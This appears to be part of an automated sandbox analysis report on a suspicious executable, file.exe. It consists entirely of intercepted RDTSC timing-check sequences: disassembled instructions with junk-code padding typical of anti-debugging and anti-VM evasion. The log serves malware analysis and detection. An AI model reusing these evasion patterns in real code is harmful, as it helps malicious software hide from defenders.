Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE565 second address: 13FE569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE569 second address: 13FE579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FAF1CBF1D46h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402C15 second address: 1402C3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007FAF1CCF5656h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FAF1CCF5666h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403C5A second address: 1403C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403F2B second address: 1403F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403F2F second address: 1403F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1406E00 second address: 1406E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E75D second address: 140E77D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D51h 0x00000008 jmp 00007FAF1CBF1D4Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E9F0 second address: 140E9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E9F5 second address: 140EA08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007FAF1CBF1D46h 0x0000000d popad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EB4A second address: 140EB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAF1CCF5668h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FAF1CCF5668h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140ECA8 second address: 140ECAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140ECAC second address: 140ECBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FAF1CCF565Ah 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EFD6 second address: 140EFDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EFDD second address: 140EFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EFE3 second address: 140F021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007FAF1CBF1D46h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FAF1CBF1D53h 0x00000019 jmp 00007FAF1CBF1D54h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F15A second address: 140F15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F15F second address: 140F165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F575 second address: 140F591 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF1CCF5664h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1412DDD second address: 1412DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14174BA second address: 14174BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14174BE second address: 14174C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14174C2 second address: 14174C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14174C8 second address: 14174CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D4FA2 second address: 13D500B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CCF565Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov ch, 89h 0x00000010 lea eax, dword ptr [ebp+1248AD74h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FAF1CCF5658h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 xor ecx, dword ptr [ebp+122D2764h] 0x00000036 nop 0x00000037 push ebx 0x00000038 jmp 00007FAF1CCF5666h 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FAF1CCF565Ah 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D500B second address: 13D5027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D58h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D50F8 second address: 13D51BB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CCF5658h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FAF1CCF565Bh 0x00000012 xchg eax, ebx 0x00000013 add dword ptr [ebp+124592EDh], esi 0x00000019 push dword ptr fs:[00000000h] 0x00000020 jmp 00007FAF1CCF565Ah 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c sub dword ptr [ebp+12453EF5h], edi 0x00000032 add dword ptr [ebp+122D225Dh], eax 0x00000038 mov dword ptr [ebp+1248ADCCh], esp 0x0000003e mov edi, dword ptr [ebp+122D3381h] 0x00000044 cmp dword ptr [ebp+122D2AD9h], 00000000h 0x0000004b jne 00007FAF1CCF575Fh 0x00000051 jmp 00007FAF1CCF565Eh 0x00000056 mov byte ptr [ebp+122D27ADh], 00000047h 0x0000005d push 00000000h 0x0000005f push ecx 0x00000060 call 00007FAF1CCF5658h 0x00000065 pop ecx 0x00000066 mov dword ptr [esp+04h], ecx 0x0000006a add dword ptr [esp+04h], 0000001Ah 0x00000072 inc ecx 0x00000073 push ecx 0x00000074 ret 0x00000075 pop ecx 0x00000076 ret 0x00000077 push edx 0x00000078 mov edi, 5782C816h 0x0000007d pop edi 0x0000007e mov cl, bl 0x00000080 mov eax, D49AA7D2h 0x00000085 mov edi, dword ptr [ebp+122DB09Eh] 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e jmp 00007FAF1CCF5669h 0x00000093 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D51BB second address: 13D51D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D59h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5497 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124548ECh], eax 0x00000014 push dword ptr [ebp+122D0131h] 0x0000001a xor edx, dword ptr [ebp+122D2BB9h] 0x00000020 call dword ptr [ebp+122D2758h] 0x00000026 pushad 0x00000027 cld 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D2EF4h], edx 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 pushad 0x00000035 call 00007FAF1CCF5665h 0x0000003a mov ebx, dword ptr [ebp+122D29A1h] 0x00000040 pop ecx 0x00000041 push ebx 0x00000042 jmp 00007FAF1CCF5668h 0x00000047 pop esi 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D2A61h], eax 0x0000004f or dword ptr [ebp+122D3381h], ebx 0x00000055 mov esi, 0000003Ch 0x0000005a sub dword ptr [ebp+122D2EF4h], edx 0x00000060 jmp 00007FAF1CCF565Fh 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jmp 00007FAF1CCF5668h 0x0000006e lodsw 0x00000070 mov dword ptr [ebp+122D1882h], edi 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a jmp 00007FAF1CCF5665h 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D2EF4h], ebx 0x00000089 jp 00007FAF1CCF5657h 0x0000008f stc 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jbe 00007FAF1CCF5658h 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5568 second address: 13D5588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jnc 00007FAF1CBF1D46h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5776 second address: 13D5792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5667h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5A20 second address: 13D5A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FAF1CBF1D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D6218 second address: 13D629B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FAF1CCF5656h 0x0000000d jmp 00007FAF1CCF565Eh 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 mov edi, eax 0x00000017 lea eax, dword ptr [ebp+1248ADB8h] 0x0000001d mov edi, 19C5DE51h 0x00000022 mov di, ax 0x00000025 push eax 0x00000026 pushad 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a pop edx 0x0000002b jmp 00007FAF1CCF5665h 0x00000030 popad 0x00000031 mov dword ptr [esp], eax 0x00000034 lea eax, dword ptr [ebp+1248AD74h] 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007FAF1CCF5658h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov di, dx 0x00000057 mov ecx, dword ptr [ebp+122D2A31h] 0x0000005d nop 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jp 00007FAF1CCF5656h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D629B second address: 13D62AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FAF1CBF1D48h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D62AD second address: 13D62B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D62B2 second address: 13D62B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14167BC second address: 14167C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14167C0 second address: 14167E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FAF1CBF1D5Dh 0x0000000e jmp 00007FAF1CBF1D55h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416AE6 second address: 1416AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416AF1 second address: 1416AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416AF7 second address: 1416AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419807 second address: 1419812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14194DA second address: 14194DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14194DE second address: 14194F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FAF1CBF1D4Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14194F8 second address: 14194FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14194FC second address: 1419522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jbe 00007FAF1CBF1D62h 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141BFBA second address: 141BFEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAF1CCF5663h 0x0000000d jmp 00007FAF1CCF5660h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141BFEE second address: 141C00A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D58h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141C00A second address: 141C013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141C013 second address: 141C018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141C018 second address: 141C020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141C2B4 second address: 141C2C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FAF1CBF1D46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FB8D second address: 141FB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FB93 second address: 141FB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FB97 second address: 141FBB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007FAF1CCF5656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF1CCF565Bh 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FBB2 second address: 141FBD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAF1CBF1D58h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FD23 second address: 141FD68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jns 00007FAF1CCF56ABh 0x0000000d pushad 0x0000000e jmp 00007FAF1CCF565Eh 0x00000013 jmp 00007FAF1CCF5665h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAF1CCF565Bh 0x00000020 jp 00007FAF1CCF5656h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FEA7 second address: 141FEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FEB0 second address: 141FED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push edx 0x00000007 jmp 00007FAF1CCF5669h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FED4 second address: 141FEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FEEA second address: 141FEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142014D second address: 1420153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14239A6 second address: 14239AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14239AB second address: 14239C2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF1CBF1D52h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1423C54 second address: 1423C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1423C5D second address: 1423C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1423E21 second address: 1423E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1423E27 second address: 1423E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1423E2B second address: 1423E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142855F second address: 1428563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428563 second address: 1428569 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428569 second address: 1428576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428576 second address: 1428588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428588 second address: 1428590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428590 second address: 1428595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428720 second address: 1428735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAF1CBF1D46h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142889A second address: 14288BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 jbe 00007FAF1CCF565Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAF1CCF565Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14288BE second address: 14288FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FAF1CBF1D52h 0x0000000f popad 0x00000010 push ecx 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jp 00007FAF1CBF1D46h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428CEF second address: 1428D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAF1CCF5663h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FAF1CCF5656h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428D12 second address: 1428D1F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5C45 second address: 13D5CB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5665h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov cx, F9C2h 0x00000010 mov ebx, dword ptr [ebp+1248ADB3h] 0x00000016 mov edi, dword ptr [ebp+122D2AADh] 0x0000001c add eax, ebx 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FAF1CCF5658h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 or di, 5F85h 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007FAF1CCF5662h 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 pop esi 0x00000048 rdtsc
